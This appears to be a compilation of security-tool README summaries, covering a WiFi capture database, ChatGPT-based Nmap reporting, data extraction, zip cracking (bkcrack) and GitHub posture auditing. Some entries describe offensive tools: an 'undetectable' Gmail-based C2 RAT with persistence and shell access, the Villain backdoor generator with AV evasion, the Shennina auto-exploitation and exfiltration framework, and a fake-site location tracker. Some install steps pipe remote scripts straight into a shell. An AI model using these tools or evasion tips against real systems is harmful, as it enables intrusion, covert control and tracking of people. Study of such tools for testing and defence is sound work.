  • ConnectedAP: This view selects the BSSID of the connected access point, the SSID of the access point, the MAC address of the connected client device, and the manufacturer of the client device. It joins the Connected, AP, and Client tables on the BSSID and MAC address, respectively, and orders the results by BSSID.

  • ProbeClientsConnected: This view selects the BSSID and SSID of the connected access point, the MAC address of the probe, the manufacturer and type of the client device, the total number of packets transmitted by the client, and the SSID of the probe. It joins the Probe, Client, and ConnectedAP tables on the MAC address of the probe, and filters the results to exclude probes that are connected to the same SSID that they are probing. The results are ordered by the SSID of the probe.

  • HandshakeAP: This view selects the BSSID of the access point, the SSID of the access point, the MAC address of the client device that performed the handshake, the manufacturer of the client device, the file containing the handshake, and the hashcat output. It joins the Handshake, AP, and Client tables on the BSSID and MAC address, respectively, and orders the results by BSSID.

  • HandshakeAPUnique: This view selects the BSSID of the access point, the SSID of the access point, the MAC address of the client device that performed the handshake, the manufacturer of the client device, the file containing the handshake, and the hashcat output. It joins the Handshake, AP, and Client tables on the BSSID and MAC address, respectively, and filters the results to exclude handshakes that were not cracked by hashcat. The results are grouped by SSID and ordered by BSSID.

  • IdentityAP: This view selects the BSSID of the access point, the SSID of the access point, the MAC address of the client device that performed the identity request, the manufacturer of the client device, the identity string, and the method used for the identity request. It joins the Identity, AP, and Client tables on the BSSID and MAC address, respectively, and orders the results by BSSID.

  • SummaryAP: This view selects the SSID, the count of access points broadcasting the SSID, the encryption type, the manufacturer of the access point, and whether the SSID is cloaked. It groups the results by SSID and orders them by the count of access points in descending order.

TODO

  • Aircrack-ng

  • All in 1 file (and separately)

  • Kismet

  • Wigle

  • install

  • parse all files in folder -f --folder

  • Fix Extended errors, tildes, etc (fixed in aircrack-ng 1.6)

  • Support bash multi files: "capture*-1*"

  • Script to delete client or AP from DB (mac). - (Whitelist)

  • Whitelist to don't add mac to DB (file whitelist.txt, add macs, create DB)

  • Overwrite if there is new info (old ESSID='', New ESSID='WIFI')

  • Table Handhsakes and PMKID

  • Hashcat hash format 22000

  • Table files, if file exists skip (full path)

  • Get HTTP POST passwords

  • DNS querys


This program is a continuation of a part of: https://github.com/T1GR3S/airo-heat

Author

  • RaΓΊl Calvo Laorden (@r4ulcl)

License

GNU General Public License v3.0



GPT_Vuln-analyzer - Uses ChatGPT API And Python-Nmap Module To Use The GPT3 Model To Create Vulnerability Reports Based On Nmap Scan Data


This is a Proof Of Concept application that demostrates how AI can be used to generate accurate results for vulnerability analysis and also allows further utilization of the already super useful ChatGPT.

Requirements

  • Python 3.10
  • All the packages mentioned in the requirements.txt file
  • OpenAi api

Usage

  • First Change the "API__KEY" part of the code with OpenAI api key
openai.api_key = "__API__KEY" # Enter your API key
  • second install the packages
pip3 install -r requirements.txt
or
pip install -r requirements.txt
  • run the code python3 gpt_vuln.py <> or if windows run python gpt_vuln.py <>

Supported in both windows and linux

Understanding the code

Profiles:

Parameter Return data Description Nmap Command
p1 json Effective Scan -Pn -sV -T4 -O -F
p2 json Simple Scan -Pn -T4 -A -v
p3 json Low Power Scan -Pn -sS -sU -T4 -A -v
p4 json Partial Intense Scan -Pn -p- -T4 -A -v
p5 json Complete Intense Scan -Pn -sS -sU -T4 -A -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script=vuln

The profile is the type of scan that will be executed by the nmap subprocess. The Ip or target will be provided via argparse. At first the custom nmap scan is run which has all the curcial arguments for the scan to continue. nextly the scan data is extracted from the huge pile of data which has been driven by nmap. the "scan" object has a list of sub data under "tcp" each labled according to the ports opened. once the data is extracted the data is sent to openai API davenci model via a prompt. the prompt specifically asks for an JSON output and the data also to be used in a certain manner.

The entire structure of request that has to be sent to the openai API is designed in the completion section of the Program.

vulnerability analysis of {} and return a vulnerabilty report in json".format(analize) # A structure for the request completion = openai.Completion.create( engine=model_engine, prompt=prompt, max_tokens=1024, n=1, stop=None, ) response = completion.choices[0].text return response" dir="auto">
def profile(ip):
nm.scan('{}'.format(ip), arguments='-Pn -sS -sU -T4 -A -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script=vuln')
json_data = nm.analyse_nmap_xml_scan()
analize = json_data["scan"]
# Prompt about what the quary is all about
prompt = "do a vulnerability analysis of {} and return a vulnerabilty report in json".format(analize)
# A structure for the request
completion = openai.Completion.create(
engine=model_engine,
prompt=prompt,
max_tokens=1024,
n=1,
stop=None,
)
response = completion.choices[0].text
return response

Advantages

  • Can be used in developing a more advanced systems completly made of the API and scanner combination
  • Can increase the effectiveness of the final system
  • Highly productive when working with models such as GPT3


DataSurgeon - Quickly Extracts IP's, Email Addresses, Hashes, Files, Credit Cards, Social Secuirty Numbers And More From Text


Β DataSurgeon (ds) is a versatile tool designed for incident response, penetration testing, and CTF challenges. It allows for the extraction of various types of sensitive information including emails, phone numbers, hashes, credit cards, URLs, IP addresses, MAC addresses, SRV DNS records and a lot more!

  • Supports Windows, Linux and MacOS

Extraction Features

  • Emails
  • Files
  • Phone numbers
  • Credit Cards
  • Google API Private Key ID's
  • Social Security Numbers
  • AWS Keys
  • Bitcoin wallets
  • URL's
  • IPv4 Addresses and IPv6 addresses
  • MAC Addresses
  • SRV DNS Records
  • Extract Hashes
    • MD4 & MD5
    • SHA-1, SHA-224, SHA-256, SHA-384, SHA-512
    • SHA-3 224, SHA-3 256, SHA-3 384, SHA-3 512
    • MySQL 323, MySQL 41
    • NTLM
    • bcrypt

Want more?

Please read the contributing guidelines here

Quick Install

Install Rust and Github

Linux

wget -O - https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.sh | bash

Windows

Enter the line below in an elevated powershell window.

IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.ps1")

Relaunch your terminal and you will be able to use ds from the command line.

Mac

curl --proto '=https' --tlsv1.2 -sSf https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.sh | sh

Command Line Arguments



Video Guide

Examples

Extracting Files From a Remote Webiste

Here I use wget to make a request to stackoverflow then I forward the body text to ds . The -F option will list all files found. --clean is used to remove any extra text that might have been returned (such as extra html). Then the result of is sent to uniq which removes any non unique files found.

 wget -qO - https://www.stackoverflow.com | ds -F --clean | uniq


Extracting Mac Addresses From an Output File

Here I am pulling all mac addresses found in autodeauth's log file using the -m query. The --hide option will hide the identifer string infront of the results. In this case 'mac_address: ' is hidden from the output. The -T option is used to check the same line multiple times for matches. Normallly when a match is found the tool moves on to the next line rather then checking again.

$ ./ds -m -T --hide -f /var/log/autodeauth/log     
2023-02-26 00:28:19 - Sending 500 deauth frames to network: BC:2E:48:E5:DE:FF -- PrivateNetwork
2023-02-26 00:35:22 - Sending 500 deauth frames to network: 90:58:51:1C:C9:E1 -- TestNet

Reading all files in a directory

The line below will will read all files in the current directory recursively. The -D option is used to display the filename (-f is required for the filename to display) and -e used to search for emails.

$ find . -type f -exec ds -f {} -CDe \;


Speed Tests

When no specific query is provided, ds will search through all possible types of data, which is SIGNIFICANTLY slower than using individual queries. The slowest query is --files. Its also slightly faster to use cat to pipe the data to ds.

Below is the elapsed time when processing a 5GB test file generated by ds-test. Each test was ran 3 times and the average time was recorded.

Computer Specs

Processor	Intel(R) Core(TM) i5-10400F CPU @ 2.90GHz, 2904 Mhz, 6 Core(s), 12 Logical Processor(s)
Ram 12.0 GB (11.9 GB usable)

Searching all data types

Command Speed
cat test.txt | ds -t 00h:02m:04s
ds -t -f test.txt 00h:02m:05s
cat test.txt | ds -t -o output.txt 00h:02m:06s

Using specific queries

Command Speed Query Count
cat test.txt | ds -t -6 00h:00m:12s 1
cat test.txt | ds -t -i -m 00h:00m:22 2
cat test.txt | ds -tF6c 00h:00m:32s 3

Project Goals

  • JSON and CSV output
  • Untar/unzip and a directorty searching mode
  • Base64 Detection and decoding


Gmailc2 - A Fully Undetectable C2 Server That Communicates Via Google SMTP To Evade Antivirus Protections And Network Traffic Restrictions


 A Fully Undetectable C2 Server That Communicates Via Google SMTP to evade Antivirus Protections 
and Network Traffic Restrictions


Note:

 This RAT communicates Via Gmail SMTP (or u can use any other smtps as well) but Gmail SMTP is valid
because most of the companies block unknown traffic so gmail traffic is valid and allowed everywhere.

Warning:

 1. Don't Upload Any Payloads To VirusTotal.com Bcz This tool will not work
with Time.
2. Virustotal Share Signatures With AV Comapnies.
3. Again Don't be an Idiot!

How To Setup

 1. Create Two seperate Gmail Accounts.
2. Now enable SMTP On Both Accounts (check youtube if u don't know)
3. Suppose you have already created Two Seperate Gmail Accounts With SMTP enabled
A -> first account represents Your_1st_gmail@gmail.com
B -> 2nd account represents your_2nd_gmail@gmail.com
4. Now Go To server.py file and fill the following at line 67:
smtpserver="smtp.gmail.com" (don't change this)
smtpuser="Your_1st_gmail@gmail.com"
smtpkey="your_1st_gmail_app_password"
imapserver="imap.gmail.com" (don't change this)
imapboy="your_2nd_gmail@gmail.com"
5. Now Go To client.py file and fill the following at line 16:
imapserver = "imap.gmail.com" (dont change this)
username = "your_2nd_gmail@gmail.com"
password = "your2ndgmailapp password"
getting = "Your_1st_gmail@gmail.com"
smtpserver = "smtp.gmail.com" (don 't change this)
6. Enjoy

How To Run:-

 *:- For Windows:-
1. Make Sure python3 and pip is installed and requriements also installed
2. python server.py (on server side)


*:- For Linux:-
1. Make Sure All Requriements is installed.
2. python3 server.py (on server side)

C2 Feature:-

 1) Persistence (type persist)
2) Shell Access
3) System Info (type info)
4) More Features Will Be Added

Features:-

1) FUD Ratio 0/40
2) Bypass Any EDR's Solutions
3) Bypass Any Network Restrictions
4) Commands Are Being Sent in Base64 And Decoded on server side
5) No More Tcp Shits

Warning:-

Use this tool Only for Educational Purpose And I will Not be Responsible For ur cruel act.


Probable_Subdomains - Subdomains Analysis And Generation Tool. Reveal The Hidden!


Online tool: https://weakpass.com/generate/domains

TL;DR

During bug bounties, penetrations tests, red teams exercises, and other great activities, there is always a room when you need to launch amass, subfinder, sublister, or any other tool to find subdomains you can use to break through - like test.google.com, dev.admin.paypal.com or staging.ceo.twitter.com. Within this repository, you will be able to find out the answers to the following questions:

  1. What are the most popular subdomains?
  2. What are the most common words in multilevel subdomains on different levels?
  3. What are the most used words in subdomains?

And, of course, wordlists for all of the questions above!


Methodology

As sources, I used lists of subdomains from public bugbounty programs, that were collected by chaos.projectdiscovery.io, bounty-targets-data or that just had responsible disclosure programs with a total number of 4095 domains! If subdomains appear more than in 5-10 different scopes, they will be put in a certain list. For example, if dev.stg appears both in *.google.com and *.twitter.com, it will have a frequency of 2. It does not matter how often dev.stg appears in *.google.com. That's all - nothing more, nothing less< /strong>.

You can find complete list of sources here

Lists

Subdomains

In these lists you will find most popular subdomains as is.

Name Words count Size
subdomains.txt.gz 21901389 501MB
subdomains_top100.txt 100 706B
subdomains_top1000.txt 1000 7.2KB
subdomains_top10000.txt 10000 70KB

Subdomain levels

In these lists, you will find the most popular words from subdomains split by levels. F.E - dev.stg subdomain will be split into two words dev and stg. dev will have level = 2, stg - level = 1. You can use these wordlists for combinatory attacks for subdomain searches. There are several types of level.txt wordlists that follow the idea of subdomains.

Name Words count Size
level_1.txt.gz 8096054 153MB
level_2.txt.gz 7556074 106MB
level_3.txt.gz 1490999 18MB
level_4.txt.gz 205969 3.2MB
level_5.txt.gz 71716 849KB
level_1_top100.txt 100 633B
level_1_top1000.txt 1000 6.6K
level_2_top100.txt 100 550B
level_2_top1000.txt 1000 5.6KB
level_3_top100.txt 100 531B
level_3_top1000.txt 1000 5.1KB
level_4_top100.txt 100 525B
level_4_top1000.txt 1000 5.0KB
level_5_top100.txt 100 449B
level_5_top1000.txt 1000 5.0KB

Popular splitted subdomains

In these lists, you will find the most popular splitted words from subdomains on all levels. For example - dev.stg subdomain will be splitted in two words dev and stg.

Name Words count Size
words.txt.gz 17229401 278MB
words_top100.txt 100 597B
words_top1000.txt 1000 5.5KB
words_top10000.txt 10000 62KB

Google Drive

You can download all the files from Google Drive

Attributions

Thanks!



Email-Vulnerablity-Checker - Find Email Spoofing Vulnerablity Of Domains


Verify whether the domain is vulnerable to spoofing by Email-vulnerablity-checker

Features

  • This tool will automatically tells you if the domain is email spoofable or not
  • you can do single and multiple domain input as well (for multiple domain checker you need to have text file with domains in it)

Usage:

Clone the package by running:

git clone  https://github.com/BLACK-SCORP10/Email-Vulnerablity-Checker.git

Step 1. Install Requirements

Linux distribution sudo apt update sudo apt install dnsutils # Install dig for CentOS sudo yum install bind-utils # Install dig for macOS brew install dig" dir="auto">
# Update the package list and install dig for Debian-based Linux distribution 
sudo apt update
sudo apt install dnsutils

# Install dig for CentOS
sudo yum install bind-utils

# Install dig for macOS
brew install dig

Step 2. Finish The Instalation

To use the Email-Vulnerablity-Checker type the following commands in Terminal:

apt install git -y 
apt install dig -y
git clone https://github.com/BLACK-SCORP10/Email-Vulnerablity-Checker.git
cd Email-Vulnerablity-Checker
chmod 777 spfvuln.sh

Run email vulnerablity checker by just typing:

./spfvuln.sh -h

Support

For Queries: Telegram
Contributions, issues, and feature requests are welcome!
Give a β˜… if you like this project!



GUAC - Aggregates Software Security Metadata Into A High Fidelity Graph Database


Note: GUAC is under active development - if you are interested in contributing, please look at contributor guide and the "express interest" issue

Graph for Understanding Artifact Composition (GUAC) aggregates software security metadata into a high fidelity graph databaseβ€”normalizing entity identities and mapping standard relationships between them. Querying this graph can drive higher-level organizational outcomes such as audit, policy, risk management, and even developer assistance.


Conceptually, GUAC occupies the β€œaggregation and synthesis” layer of the software supply chain transparency logical model:

A few examples of questions answered by GUAC include:

Quickstart

Refer to the Setup + Demo document to learn how to prepare your environment and try GUAC out!

Architecture

Here is an overview of the architecture of GUAC:

Supported input formats

Additional References

Communication

We encourage discussions to be done on github issues. We also have a public slack channel on the OpenSSF slack.

For security issues or code of conduct concerns, an e-mail should be sent to guac-maintainers@googlegroups.com.

Governance

Information about governance can be found here.



Tai-e - An Easy-To-Learn/Use Static Analysis Framework For Java


Tai-e

What is Tai-e?

Tai-e (Chinese: ε€ͺ阿; pronunciation: [ˈtaΙͺΙ™:]) is a new static analysis framework for Java (please see our technical report for details), which features arguably the "best" designs from both the novel ones we proposed and those of classic frameworks such as Soot, WALA, Doop, and SpotBugs. Tai-e is easy-to-learn, easy-to-use, efficient, and highly extensible, allowing you to easily develop new analyses on top of it.

Currently, Tai-e provides the following major analysis components (and more analyses are on the way):

  • Powerful pointer analysis framework
    • On-the-fly call graph construction
    • Various classic and advanced techniques of heap abstraction and context sensitivity for pointer analysis
    • Extensible analysis plugin system (allows to conveniently develop and add new analyses that interact with pointer analysis)
  • Various fundamental/client/utility analyses
    • Fundamental analyses, e.g., reflection analysis and exception analysis
    • Modern language feature analyses, e.g., lambda and method reference analysis, and invokedynamic analysis
    • Clients, e.g., configurable taint analysis (allowing to configure sources, sinks and taint transfers)
    • Utility tools like analysis timer, constraint checker (for debugging), and various graph dumpers
  • Control/Data-flow analysis framework
    • Control-flow graph construction
    • Classic data-flow analyses, e.g., live variable analysis, constant propagation
    • Your data-flow analyses
  • SpotBugs-like bug detection system
    • Bug detectors, e.g., null pointer detector, incorrect clone() detector
    • Your bug detectors

Tai-e is developed in Java, and it can run on major operating systems including Windows, Linux, and macOS.


How to Obtain Runnable Jar of Tai-e?

The simplest way is to download it from GitHub Releases.

Alternatively, you might build the latest Tai-e yourself from the source code. This can be simply done via Gradle (be sure that Java 17 (or higher version) is available on your system). You just need to run command gradlew fatJar, and then the runnable jar will be generated in tai-e/build/, which includes Tai-e and all its dependencies.

Documentation

We are hosting the documentation of Tai-e on the GitHub wiki, where you could find more information about Tai-e such as Setup in IntelliJ IDEA , Command-Line Options , and Development of New Analysis .

Tai-e Assignments

In addition, we have developed an educational version of Tai-e where eight programming assignments are carefully designed for systematically training learners to implement various static analysis techniques to analyze real Java programs. The educational version shares a large amount of code with Tai-e, thus doing the assignments would be a good way to get familiar with Tai-e.



Bkcrack - Crack Legacy Zip Encryption With Biham And Kocher's Known Plaintext Attack


Crack legacy zip encryption with Biham and Kocher's known plaintext attack.

Overview

A ZIP archive may contain many entries whose content can be compressed and/or encrypted. In particular, entries can be encrypted with a password-based Encryption Algorithm symmetric encryption algorithm referred to as traditional PKWARE encryption, legacy encryption or ZipCrypto. This algorithm generates a pseudo-random stream of bytes (keystream) which is XORed to the entry's content (plaintext) to produce encrypted data (ciphertext). The generator's state, made of three 32-bits integers, is initialized using the password and then continuously updated with plaintext as encryption goes on. This encryption algorithm is vulnerable to known plaintext attacks as shown by Eli Biham and Paul C. Kocher in the research paper A known plaintext attack on the PKZIP stream cipher. Given ciphertext and 12 or more bytes of the corresponding plaintext, the internal state of the keystream generator can be recovered. This internal state is enough to decipher ciphertext entirely as well as other entries which were encrypted with the same password. It can also be used to bruteforce the password with a complexity of nl-6 where n is the size of the character set and l is the length of the password.

bkcrack is a command-line tool which implements this known plaintext attack. The main features are:

  • Recover internal state from ciphertext and plaintext.
  • Change a ZIP archive's password using the internal state.
  • Recover the original password from the internal state.

Install

Precompiled packages

You can get the latest official release on GitHub.

Precompiled packages for Ubuntu, MacOS and Windows are available for download. Extract the downloaded archive wherever you like.

On Windows, Microsoft runtime libraries are needed for bkcrack to run. If they are not already installed on your system, download and install the latest Microsoft Visual C++ Redistributable package.

Compile from source

Alternatively, you can compile the project with CMake.

First, download the source files or clone the git repository. Then, running the following commands in the source tree will create an installation in the install folder.

cmake -S . -B build -DCMAKE_INSTALL_PREFIX=install
cmake --build build --config Release
cmake --build build --config Release --target install

Thrid-party packages

bkcrack is available in the package repositories listed on the right. Those packages are provided by external maintainers.

Usage

List entries

You can see a list of entry names and metadata in an archive named archive.zip like this:

bkcrack -L archive.zip

Entries using ZipCrypto encryption are vulnerable to a known-plaintext attack.

Recover internal keys

The attack requires at least 12 bytes of known plaintext. At least 8 of them must be contiguous. The larger the contiguous known plaintext, the faster the attack.

Load data from zip archives

Having a zip archive encrypted.zip with the entry cipher being the ciphertext and plain.zip with the entry plain as the known plaintext, bkcrack can be run like this:

bkcrack -C encrypted.zip -c cipher -P plain.zip -p plain

Load data from files

Having a file cipherfile with the ciphertext (starting with the 12 bytes corresponding to the encryption header) and plainfile with the known plaintext, bkcrack can be run like this:

bkcrack -c cipherfile -p plainfile

Offset

If the plaintext corresponds to a part other than the beginning of the ciphertext, you can specify an offset. It can be negative if the plaintext includes a part of the encryption header.

bkcrack -c cipherfile -p plainfile -o offset

Sparse plaintext

If you know little contiguous plaintext (between 8 and 11 bytes), but know some bytes at some other known offsets, you can provide this information to reach the requirement of a total of 12 known bytes. To do so, use the -x flag followed by an offset and bytes in hexadecimal.

bkcrack -c cipherfile -p plainfile -x 25 4b4f -x 30 21

Number of threads

If bkcrack was built with parallel mode enabled, the number of threads used can be set through the environment variable OMP_NUM_THREADS.

Decipher

If the attack is successful, the deciphered data associated to the ciphertext used for the attack can be saved:

bkcrack -c cipherfile -p plainfile -d decipheredfile

If the keys are known from a previous attack, it is possible to use bkcrack to decipher data:

bkcrack -c cipherfile -k 12345678 23456789 34567890 -d decipheredfile

Decompress

The deciphered data might be compressed depending on whether compression was used or not when the zip file was created. If deflate compression was used, a Python 3 script provided in the tools folder may be used to decompress data.

python3 tools/inflate.py < decipheredfile > decompressedfile

Unlock encrypted archive

It is also possible to generate a new encrypted archive with the password of your choice:

bkcrack -C encrypted.zip -k 12345678 23456789 34567890 -U unlocked.zip password

The archive generated this way can be extracted using any zip file utility with the new password. It assumes that every entry was originally encrypted with the same password.

Recover password

Given the internal keys, bkcrack can try to find the original password. You can look for a password up to a given length using a given character set:

bkcrack -k 1ded830c 24454157 7213b8c5 -r 10 ?p

You can be more specific by specifying a minimal password length:

bkcrack -k 18f285c6 881f2169 b35d661d -r 11..13 ?p

Learn

A tutorial is provided in the example folder.

For more information, have a look at the documentation and read the source.

Contribute

Do not hesitate to suggest improvements or submit pull requests on GitHub.

License

This project is provided under the terms of the zlib/png license.



Villain - Windows And Linux Backdoor Generator And Multi-Session Handler That Allows Users To Connect With Sibling Servers And Share Their Backdoor Sessions


Villain is a Windows & Linux backdoor generator and multi-session handler that allows users to connect with sibling servers (other machines running Villain) and share their backdoor sessions, handy for working as a team.

The main idea behind the payloads generated by this tool is inherited from HoaxShell. One could say that Villain is an evolved, steroid-induced version of it.

This is an early release currently being tested.
If you are having detection issues, watch this video on how to bypass signature-based detection

Video Presentation

[2022-11-30] Recent & awesome, made by John Hammond -> youtube.com/watch?v=pTUggbSCqA0
[2022-11-14] Original release demo, made by me -> youtube.com/watch?v=NqZEmBsLCvQ

Disclaimer: Running the payloads generated by this tool against hosts that you do not have explicit permission to test is illegal. You are responsible for any trouble you may cause by using this tool.


Installation & Usage

git clone https://github.com/t3l3machus/Villain
cd ./Villain
pip3 install -r requirements.txt

You should run as root:

Villain.py [-h] [-p PORT] [-x HOAX_PORT] [-c CERTFILE] [-k KEYFILE] [-u] [-q]

For more information about using Villain check out the Usage Guide.

Important Notes

  1. Villain has a built-in auto-obfuscate payload function to assist users in bypassing AV solutions (for Windows payloads). As a result, payloads are undetected (for the time being).
  2. Each generated payload is going to work only once. An already used payload cannot be reused to establish a session.
  3. The communication between sibling servers is AES encrypted using the recipient sibling server's ID as the encryption KEY and the 16 first bytes of the local server's ID as IV. During the initial connection handshake of two sibling servers, each server's ID is exchanged clear text, meaning that the handshake could be captured and used to decrypt traffic between sibling servers. I know it's "weak" that way. It's not supposed to be super secure as this tool was designed to be used during penetration testing / red team assessments, for which this encryption schema should be enough.
  4. Villain instances connected with each other (sibling servers) must be able to directly reach each other as well. I intend to add a network route mapping utility so that sibling servers can use one another as a proxy to achieve cross network communication between them.

Approach

A few notes about the http(s) beacon-like reverse shell approach:

Limitations

  • A backdoor shell is going to hang if you execute a command that initiates an interactive session. For more information read this.

Advantages

  • When it comes to Windows, the generated payloads can run even in PowerShell constraint Language Mode.
  • The generated payloads can run even by users with limited privileges.

Contributions

Pull requests are generally welcome. Please, keep in mind: I am constantly working on new offsec tools as well as maintaining several existing ones. I rarely accept pull requests because I either have a plan for the course of a project or I evaluate that it would be hard to test and/or maintain the foreign code. It doesn't have to do with how good or bad is an idea, it's just too much work and also, I am kind of developing all these tools to learn myself.

There are parts of this project that were removed before publishing because I considered them to be buggy or hard to maintain (at this early stage). If you have an idea for an addition that comes with a significant chunk of code, I suggest you first contact me to discuss if there's something similar already in the making, before making a PR.



Shennina - Automating Host Exploitation With AI


Shennina is an automated host exploitation framework. The mission of the project is to fully automate the scanning, vulnerability scanning/analysis, and exploitation using Artificial Intelligence. Shennina is integrated with Metasploit and Nmap for performing the attacks, as well as being integrated with an in-house Command-and-Control Server for exfiltrating data from compromised machines automatically.

This was developed by Mazin Ahmed and Khalid Farah within the HITB CyberWeek 2019 AI challenge. The project is developed based on the concept of DeepExploit by Isao Takaesu.

Shennina scans a set of input targets for available network services, uses its AI engine to identify recommended exploits for the attacks, and then attempts to test and attack the targets. If the attack succeeds, Shennina proceeds with the post-exploitation phase.

The AI engine is initially trained against live targets to learn reliable exploits against remote services.

Shennina also supports a "Heuristics" mode for identfying recommended exploits.

The documentation can be found in the Docs directory within the project.


Features

  • Automated self-learning approach for finding exploits.
  • High performance using managed concurrency design.
  • Intelligent exploits clustering.
  • Post exploitation capabilities.
  • Deception detection.
  • Ransomware simulation capabilities.
  • Automated data exfiltration.
  • Vulnerability scanning mode.
  • Heuristic mode support for recommending exploits.
  • Windows, Linux, and macOS support for agents.
  • Scriptable attack method within the post-exploitation phase.
  • Exploits suggestions for Kernel exploits.
  • Out-of-Band technique testing for exploitation checks.
  • Automated exfiltration of important data on compromised servers.
  • Reporting capabilities.
  • Coverage for 40+ TTPs within the MITRE ATT&CK Framework.
  • Supports multi-input targets.

Why are we solving this problem with AI?

The problem should be solved by a hash tree without using "AI", however, the HITB Cyber Week AI Challenge required the project to find ways to solve it through AI.

Note

This project is a security experiment.

Legal Disclaimer

This project is made for educational and ethical testing purposes only. Usage of Shennina for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

Authors



Legitify - Detect And Remediate Misconfigurations And Security Risks Across All Your GitHub Assets


Strengthen the security posture of your GitHub organization!
Detect and remediate misconfigurations, security and compliance issues across all your GitHub assets with ease

Β 

Installation

  1. You can download the latest legitify release from https://github.com/Legit-Labs/legitify/releases, each archive contains:
  • Legitify binary for the desired platform
  • Built-in policies provided by Legit Security
  1. From source with the following steps:
git clone git@github.com:Legit-Labs/legitify.git
go run main.go analyze ...

Provenance

To enhance the software supply chain security of legitify's users, as of v0.1.6, every legitify release contains a SLSA Level 3 Provenacne document.
The provenance document refers to all artifacts in the release, as well as the generated docker image.
You can use SLSA framework's official verifier to verify the provenance.
Example of usage for the darwin_arm64 architecture for the v0.1.6 release:

VERSION=0.1.6
ARCH=darwin_arm64
./slsa-verifier verify-artifact --source-branch main --builder-id 'https://github.com/slsa-framework/slsa-github-generator/.github/workflows/generator_generic_slsa3.yml@refs/tags/v1.2.2' --source-uri "git+https://github.com/Legit-Labs/legitify" --provenance-path multiple.intoto.jsonl ./legitify_${VERSION}_${ARCH}.tar.gz

Requirements

  1. To get the most out of legitify, you need to be an owner of at least one GitHub organization. Otherwise, you can still use the tool if you're an admin of at least one repository inside an organization, in which case you'll be able to see only repository-related policies results.
  2. legitify requires a GitHub personal access token (PAT) to analyze your resources successfully, which can be either provided as an argument (-t) or as an environment variable ($GITHUB_ENV). The PAT needs the following scopes for full analysis:
admin:org, read:enterprise, admin:org_hook, read:org, repo, read:repo_hook

See Creating a Personal Access Token for more information.
Fine-grained personal access tokens are currently not supported because they do not support GitHub's GraphQL (https://github.blog/2022-10-18-introducing-fine-grained-personal-access-tokens-for-github/)

Usage

LEGITIFY_TOKEN=<your_token> legitify analyze

By default, legitify will check the policies against all your resources (organizations, repositories, members, actions).

You can control which resources will be analyzed with command-line flags namespace and org:

  • --namespace (-n): will analyze policies that relate to the specified resources
  • --org: will limit the analysis to the specified organizations
LEGITIFY_TOKEN=<your_token> legitify analyze --org org1,org2 --namespace organization,member

The above command will test organization and member policies against org1 and org2.

GitHub Enterprise Support

You can run legitify against a GitHub Enterprise instance if you set the endpoint URL in the environment variable SERVER_URL:

export SERVER_URL="https://github.example.com/"
LEGITIFY_TOKEN=<your_token> legitify analyze --org org1,org2 --namespace organization,member

GitLab Cloud/Server Support

To run legitify against GitLab Cloud set the scm flag to gitlab --scm gitlab, to run against GitLab Server you need to provide also SERVER_URL:

export SERVER_URL="https://gitlab.example.com/"
LEGITIFY_TOKEN=<your_token> legitify analyze --namespace organization --scm gitlab

Namespaces

Namespaces in legitify are resources that are collected and run against the policies. Currently, the following namespaces are supported:

  1. organization - organization level policies (e.g., "Two-Factor Authentication Is Not Enforced for the Organization")
  2. actions - organization GitHub Actions policies (e.g., "GitHub Actions Runs Are Not Limited To Verified Actions")
  3. member - organization members policies (e.g., "Stale Admin Found")
  4. repository - repository level policies (e.g., "Code Review By At Least Two Reviewers Is Not Enforced")
  5. runner_group - runner group policies (e.g, "runner can be used by public repositories")

By default, legitify will analyze all namespaces. You can limit only to selected ones with the --namespace flag, and then a comma separated list of the selected namespaces.

Output Options

By default, legitify will output the results in a human-readable format. This includes the list of policy violations listed by severity, as well as a summary table that is sorted by namespace.

Output Formats

Using the --output-format (-f) flag, legitify supports outputting the results in the following formats:

  1. human-readable - Human-readable text (default).
  2. json - Standard JSON.

Output Schemes

Using the --output-scheme flag, legitify supports outputting the results in different grouping schemes. Note: --output-format=json must be specified to output non-default schemes.

  1. flattened - No grouping; A flat listing of the policies, each with its violations (default).
  2. group-by-namespace - Group the policies by their namespace.
  3. group-by-resource - Group the policies by their resource e.g. specific organization/repository.
  4. group-by-severity - Group the policies by their severity.

Output Destinations

  • --output-file - full path of the output file (default: no output file, prints to stdout).
  • --error-file - full path of the error logs (default: ./error.log).

Coloring

When outputting in a human-readable format, legitify support the conventional --color[=when] flag, which has the following options:

  • auto - colored output if stdout is a terminal, uncolored otherwise (default).
  • always - colored output regardless of the output destination.
  • none - uncolored output regardless of the output destination.

Misc

  • Use the --failed-only flag to filter-out passed/skipped checks from the result.

Scorecard Support

scorecard is an OSSF's open-source project:

Scorecards is an automated tool that assesses a number of important heuristics ("checks") associated with software security and assigns each check a score of 0-10. You can use these scores to understand specific areas to improve in order to strengthen the security posture of your project. You can also assess the risks that dependencies introduce, and make informed decisions about accepting these risks, evaluating alternative solutions, or working with the maintainers to make improvements.

legitify supports running scorecard for all of the organization's repositories, enforcing score policies and showing the results using the --scorecard flag:

  • no - do not run scorecard (default).
  • yes - run scorecard and employ a policy that alerts on each repo score below 7.0.
  • verbose - run scorecard, employ a policy that alerts on each repo score below 7.0, and embed its output to legitify's output.

legitify runs the following scorecard checks:

Check Public Repository Private Repository
Security-Policy V
CII-Best-Practices V
Fuzzing V
License V
Signed-Releases V
Branch-Protection V V
Code-Review V V
Contributors V V
Dangerous-Workflow V V
Dependency-Update-Tool V V
Maintained V V
Pinned-Dependencies V V
SAST V V
Token-Permissions V V
Vulnerabilities V V
Webhooks V V

Policies

legitify comes with a set of policies in the policies/github directory. These policies are documented here.

In addition, you can use the --policies-path (-p) flag to specify a custom directory for OPA policies.

Contribution

Thank you for considering contributing to Legitify! We encourage and appreciate any kind of contribution. Here are some resources to help you get started:



R4Ven - Track Ip And GPS Location

Track User's Smartphone/Pc Ip And Gps Location.

The tool hosts a fake website which uses an iframe to display a legit website and, if the target allows it, it will fetch the Gps location (latitude and longitude) of the target along with IP Address and Device Information.

This tool is a Proof of Concept and is for Educational Purposes Only.

Using this tool, you can find out what information a malicious website can gather about you and your devices and why you shouldn't click on random links or grant permissions like Location to them.


On link click

+ it wil automatically fetch ip address and device information
! if location permission allowed, it will fetch exact location of target.

Limitation

